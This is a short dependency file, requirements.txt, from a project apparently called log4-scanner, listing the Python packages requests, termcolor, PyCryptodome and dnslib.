-------------------------------------------------------------------------------- /log4-scanner/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | termcolor 3 | PyCryptodome 4 | dnslib --------------------------------------------------------------------------------